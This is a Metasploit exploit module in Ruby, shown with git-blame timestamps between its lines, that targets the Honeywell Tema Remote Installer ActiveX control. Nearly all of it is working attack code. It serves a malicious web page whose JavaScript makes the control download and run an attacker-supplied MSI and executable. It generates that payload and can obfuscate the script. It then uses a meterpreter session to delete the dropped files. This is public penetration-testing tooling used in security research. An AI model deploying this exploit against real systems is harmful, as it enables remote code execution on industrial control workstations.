2013-01-08 16:46:31 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2013-01-08 16:46:31 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
2013-08-30 21:28:54 +00:00
|
|
|
Rank = ExcellentRanking
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::HttpServer::HTML
|
|
|
|
include Msf::Exploit::EXE
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => "Honeywell Tema Remote Installer ActiveX Remote Code Execution",
|
|
|
|
'Description' => %q{
|
|
|
|
This modules exploits a vulnerability found in the Honewell Tema ActiveX Remote
|
|
|
|
Installer. This ActiveX control can be abused by using the DownloadFromURL()
|
|
|
|
function to install an arbitrary MSI from a remote location without checking source
|
|
|
|
authenticity or user notification. This module has been tested successfully with
|
|
|
|
the Remote Installer ActiveX installed with HoneyWell EBI R410.1 - TEMA 5.3.0 and
|
|
|
|
Internet Explorer 6, 7 and 8 on Windows XP SP3.
|
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'Billy Rios', # Vulnerability discovery
|
|
|
|
'Terry McCorkle', # Vulnerability discovery
|
|
|
|
'juan vazquez' # Metasploit
|
|
|
|
],
|
|
|
|
'References' =>
|
|
|
|
[
|
2016-07-15 17:00:31 +00:00
|
|
|
[ 'OSVDB', '76681' ],
|
2013-08-30 21:28:54 +00:00
|
|
|
[ 'BID', '50078' ],
|
|
|
|
[ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICSA-11-285-01.pdf' ]
|
|
|
|
],
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'Space' => 2048,
|
|
|
|
'StackAdjustment' => -3500
|
|
|
|
},
|
|
|
|
'DefaultOptions' =>
|
|
|
|
{
|
|
|
|
'EXITFUNC' => "none",
|
|
|
|
'InitialAutoRunScript' => 'migrate -k -f'
|
|
|
|
},
|
|
|
|
'Platform' => 'win',
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
# HoneyWell EBI R410.1 - TEMA 5.3.0
|
|
|
|
# Tema_RemoteInstaller.ocx 1.0.0.0
|
|
|
|
[ 'Automatic', {} ]
|
|
|
|
],
|
|
|
|
'Privileged' => false,
|
|
|
|
'DisclosureDate' => "Oct 20 2011",
|
|
|
|
'DefaultTarget' => 0))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
|
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
@dropped_files = [
|
|
|
|
'payload.exe',
|
|
|
|
'ThinClient_TemaKit.msi',
|
|
|
|
'ThinClient_TemaKit.log'
|
|
|
|
]
|
|
|
|
super
|
|
|
|
end
|
|
|
|
|
|
|
|
def on_new_session(session)
|
|
|
|
if session.type == "meterpreter"
|
|
|
|
session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
|
|
|
|
|
2013-12-19 01:43:59 +00:00
|
|
|
@dropped_files.each do |file|
|
|
|
|
win_file = file.gsub("/", "\\\\")
|
2013-08-30 21:28:54 +00:00
|
|
|
begin
|
2013-12-19 01:43:59 +00:00
|
|
|
wintemp = session.sys.config.getenv('WINDIR')
|
2013-08-30 21:28:54 +00:00
|
|
|
win_file = "#{wintemp}\\Temp\\#{win_file}"
|
|
|
|
# Meterpreter should do this automatically as part of
|
|
|
|
# fs.file.rm(). Until that has been implemented, remove the
|
|
|
|
# read-only flag with a command.
|
|
|
|
session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
|
|
|
|
session.fs.file.rm(win_file)
|
|
|
|
print_good("Deleted #{file}")
|
|
|
|
true
|
|
|
|
rescue ::Rex::Post::Meterpreter::RequestError
|
|
|
|
print_error("Failed to delete #{win_file}")
|
|
|
|
false
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
def on_request_uri(cli, request)
|
|
|
|
agent = request.headers['User-Agent']
|
|
|
|
|
|
|
|
# Windows 7 isn't normally supported because the user won't have write access to the
|
|
|
|
# %WINDIR%/Temp directory, where the downloaded components are stored.
|
|
|
|
if not (agent =~ /MSIE \d/ and agent =~ /NT 5\.1/) and agent !~ /Tema_RemoteInstaller/
|
|
|
|
print_error("Browser not supported: #{agent.to_s}")
|
|
|
|
send_not_found(cli)
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
# exec_payload.msi needs it to be named payload.exe
|
|
|
|
# atm there isn't msi generation on the fly
|
|
|
|
if request.uri =~ /payload\.exe$/
|
|
|
|
return if ((p=regenerate_payload(cli))==nil)
|
|
|
|
data = generate_payload_exe({:code=>p.encoded})
|
|
|
|
print_status("Sending payload")
|
|
|
|
send_response(cli, data, {'Content-Type'=>'application/octet-stream'})
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
if request.uri =~ /\.msi$/
|
2013-09-26 19:34:48 +00:00
|
|
|
msi_source = ::File.join(Msf::Config.data_directory, "exploits", "exec_payload.msi")
|
2013-08-30 21:28:54 +00:00
|
|
|
source = ::File.open(msi_source, "rb"){|fd| fd.read(fd.stat.size) }
|
|
|
|
print_status("Sending msi")
|
|
|
|
send_response(cli, source, {'Content-Type'=>'application/octet-stream'})
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
if agent =~ /MSIE 6/
|
|
|
|
# The 'setTimeout' trick allows to execute the installer on IE6 even if the user
|
|
|
|
# doesn't click the warning popup when downloading the payload.
|
|
|
|
# The ThinClient_TemaKit.msi installer name must be static.
|
|
|
|
# <object id="obj" classid="clsid:E01DF79C-BE0C-4999-9B13-B5F7B2306E9B">
|
|
|
|
js = <<-EOS
|
|
|
|
var obj = new ActiveXObject('Tema_RemoteInstaller.RemoteInstaller');
|
|
|
|
setTimeout("obj.DownloadFromURL('#{get_uri}/ThinClient_TemaKit.msi');", 1000);
|
|
|
|
obj.DownloadFromURL('#{get_uri}/payload.exe');
|
|
|
|
EOS
|
|
|
|
else
|
|
|
|
js = <<-EOS
|
|
|
|
var obj = new ActiveXObject('Tema_RemoteInstaller.RemoteInstaller');
|
|
|
|
obj.DownloadFromURL('#{get_uri}/payload.exe');
|
|
|
|
obj.DownloadFromURL('#{get_uri}/ThinClient_TemaKit.msi');
|
|
|
|
EOS
|
|
|
|
end
|
|
|
|
|
|
|
|
js.gsub!(/\t\t\t/, "")
|
|
|
|
|
|
|
|
if datastore['OBFUSCATE']
|
|
|
|
js = ::Rex::Exploitation::JSObfu.new(js)
|
|
|
|
js.obfuscate
|
|
|
|
end
|
|
|
|
|
|
|
|
html = <<-EOS
|
|
|
|
<html>
|
|
|
|
<body>
|
|
|
|
</object>
|
|
|
|
<script>
|
|
|
|
#{js}
|
|
|
|
</script>
|
|
|
|
</body>
|
|
|
|
</html>
|
|
|
|
EOS
|
|
|
|
|
|
|
|
print_status("Sending html")
|
|
|
|
send_response(cli, html, {'Content-Type'=>'text/html'})
|
|
|
|
|
|
|
|
end
|
2013-01-08 16:46:31 +00:00
|
|
|
|
2013-12-19 01:43:59 +00:00
|
|
|
end
|